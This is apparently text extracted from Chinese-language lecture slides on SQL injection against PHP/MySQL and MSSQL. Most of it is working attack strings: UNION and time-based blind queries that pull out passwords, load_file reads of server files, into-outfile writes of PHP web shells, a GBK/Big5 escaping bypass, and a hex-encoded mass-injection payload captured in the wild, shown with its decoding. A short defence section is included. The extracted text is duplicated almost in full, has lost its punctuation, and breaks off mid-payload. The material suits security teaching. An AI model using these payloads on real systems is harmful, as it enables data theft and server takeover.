CONCAT(str1str2) 返回值為所有連接參數產生的字串
NAME_CONST(namevalue) 返回一個定值當月來產生一個結果集合列時NAME_CONST()促使該列使用定義名稱 51後限制僅能使用CONST的變數
hellip
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection攻擊技巧 - 相關系統函數
函數 功能
LOAD_FILE(file_name) 讀取檔案
INTO OUTFILE varwwwhtmlbackphp 輸出檔案
VERSION() 返回MySQL伺服器版本
DATABASE() 目前使用資料庫名稱
USER() 返回目前MySQL用戶與主機名稱
SYSTEM_USER() 與USER()同義
SESSION_USER() 與USER()同義
SCHEMA() 與DATABASE()同義
CURRENT_USER() 返回當前被驗證的用戶名與主機名組合可能與USER()值有所不同
DATADIR 讀取資料庫路徑
BASEDIR 資料庫安裝路徑
hellip
SQL Injection攻擊技巧 ndash 讀檔注意事項
bull 欲讀取文件必須在伺服器上
bull 必須指定文件完整的路徑
bull 必須有權限讀取並且文件必須完全可讀
bull 欲讀取文件必須小於 max_allowed_packet
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
ndash 有弱點的SQL語法沒有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `id` =$id
ndash 沒有引號攻擊範例
bull httpwwwhackdemocomgetUserphpid=1+and+1=2+UNI
ON+SELECT+1234
ndash 實際執行語法
bull SELECT FROM `member` WHERE `id` =1 AND 1=2
UNION SELECT 1234
SQL Injection攻擊技巧 ndash UNION
bull PHP+MySQL未支援多指令查詢利用聯集查詢UNION
bull 有弱點的SQL語法有引號的參數(以PHP為例)
bull SELECT FROM `member` WHERE `name` like $name
bull 沒有引號攻擊範例
bull httpwwwhackdemocomsearchUserphpname=ha
nd1=2unionselect123user()23
bull 實際執行語法
bull SELECT FROM `member` WHERE `name` like
hand1=2unionselect123user()
SQL Injection攻擊技巧 - 成功控制語法
SQL Injection攻擊技巧 ndash 猜解資料
bull 取得長度
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=1
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+LENGTH(PA
SSWORD)=7
bull 猜解資料
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=a
ndash hellip
ndash httpwwwhackdemocomgetUserphpid=1+AND+RIGHT(PAS
SWORD1)=w
SQL Injection攻擊技巧 ndash 讀寫檔案
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserphpid=1+into+outfile+DW
ebsitewwwhackdemocommembertxt
bull 寫後門
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+223Cphp+system($_GET[cmd])3E22234+i
nto+outfile+DWebsitewwwhackdemocomcmdphp
加上跳脫與關閉錯誤訊息這樣安全了嗎
SQL Blind Injection
bull SQL盲注入(SQL Blind Injection)也是一種SQL Injection的類型一般
SQL Injection仰賴出錯的相關訊息建構攻擊語法而盲注入完全仰賴語法
執行的對(true)錯(false)
bull SQL Blind Injection
ndash 一般盲注入
ndash Time-Based Blind SQL Injection
Time-Based Blind SQL Injection (12)
bull 透過時間的延遲來判斷該SQL語法是否執行成功
bull 技巧
ndash 內建函數
bull BENCHMARK(COUNT EXPR)
bull SLEEP(seconds)
ndash MySQL gt= 5
ndash 創建較花時間的語法(heavy queries)
Time-Based Blind SQL Injection - 使用heavy queries (22)
Time-Based Blind SQL Injection - 透過時間延遲猜解資料庫名稱
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(1)BENCHMARK(5000000E
NCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABAS
E()+as+db)+AS+tb
bull hellip
bull httpwwwhackdemocomgetUserLashphpid=1+UNION+SEL
ECT+IF(SUBSTRING(db11)=CHAR(104)BENCHMARK(5000000
ENCODE(ENCODE5s))NULL)234+FROM+(SELECT+DATABA
SE()+as+db)+AS+tb
SQL Injection攻擊技巧 - 繞過跳脫字元
bull ACSII編碼
ndash ASCII() CHAR()
ndash 單一
bull CHAR(68)
ndash 多個
bull CHAR(68 58 92)
bull 16進位編碼
ndash HEX()
ndash 0x443A5C
bull 雙位元組跳脫技巧
SQL Injection攻擊技巧 - 猜解資料(繞過跳脫)
bull 猜解欄位
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+user--
ndash httpwwwhackdemocomgetUserphpid=1+AND+1=2+UNIO
N+SELECT+1234+FROM+member--
bull 猜解欄位資料
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(0)
ndash hellip
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+RIGHT
(PASSWORD1)=char(119)
SQL Injection攻擊技巧 - 讀取資料(繞過跳脫)
bull 讀資料寫檔案
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(char(6858928710198
11510511610192119119119461049799107100101
1091114699111109921031011168511510111446
112104112))--
ndash httpwwwhackdemocomgetUserLashphpid=1+AND+1=
2+UNION+SELECT+123load_file(0x443A5C576562736974
655C7777772E6861636B64656D6F2E636F6D5C636F6E6669
672E706870)--
SQL Injection攻擊技巧 ndash 寫檔案(無法繞過引號限制)
1 找到phpMyAdmin
2 遠端MySQL
mysqlgt use xssdb
mysqlgt set
a=0x73656C656374203078334333463730363837303230343036353736363136433238323
435463530344635333534354232373633364436343237354432393342334633452066726F6D
20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70
687027
mysqlgt prepare cmd from a
mysqlgt execute cmd
a為
select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from
xss limit 1 into outfile Cshellphp
寫入檔案為
ltphp eval($_POST[cmd])gt
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(13)
bull 透過注入的編碼與反斜線(5c)重組產生字繞過跳脫字元的限制
bull 情境
ndash 跳脫字元處理
bull addslashes
bull mysql_escape_string
bull phpin
ndash magic_quotes_gpc 開啟
ndash 採用BIG5或GBK編碼
bull set names gbk set names big5
SQL Injection攻擊技巧 - 雙位元組跳脫技巧(23)
bull 中文語系文字以兩個位元組表示
ndash Big5
bull 高位元組 0x81-0xFE低位元組 0x40-0x7E0xA1-0xFE
ndash GBK
bull 前位元組 0x81-0xFE後位元組 0x40-0x7E
ndash GB2312
bull 前位元組 0xB0-0xF7後位元組 0xA0-0xFE
ndash 攻擊字元 BF CC D5hellip
SQL Injection攻擊技巧 -雙位元組跳脫技巧 (33)
bull 有引號的參數繞過跳脫
ndash httpwwwhackdemocomsearchUserLashphpname=h
B5+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
CC+AND+1=2+UNION+SELECT+123423
ndash httpwwwhackdemocomsearchUserLashphpname=h
d5+AND+1=2+UNION+SELECT+123423
SQL Column Truncation ndash 簡介(13)
bull MySQL中 SQL mode
ndash 沒有開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現警告提示
bull 但資料還是會新增
ndash 開啟 STRICT_ALL_TABLES
bull 使用者新增超過長度的資料會出現提示
bull 出現ERROR 1406 該資料不會成功新增
bull 慘案
ndash 2008-09-07
bull WordPress 261 SQL Column Truncation Vulnerability
SQL Column Truncation - 效果(23)
SQL Column Truncation - 防禦方案(33)
bull 在字串中不該有空白的主動清除
ndash 如帳號類資訊
bull 在 SELECT 資料時加上 BINARY 參數
bull 在 MySQL 設定預設以 BINARY 查詢
bull 在 MySQL 開啟 STRICT_ALL_TABLES
ndash 超過欄位長度會出現 ERROR 而非出現 WARNING
ndash 新增資料為避免發生錯誤 可能需在新增修改加入額外檢查
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
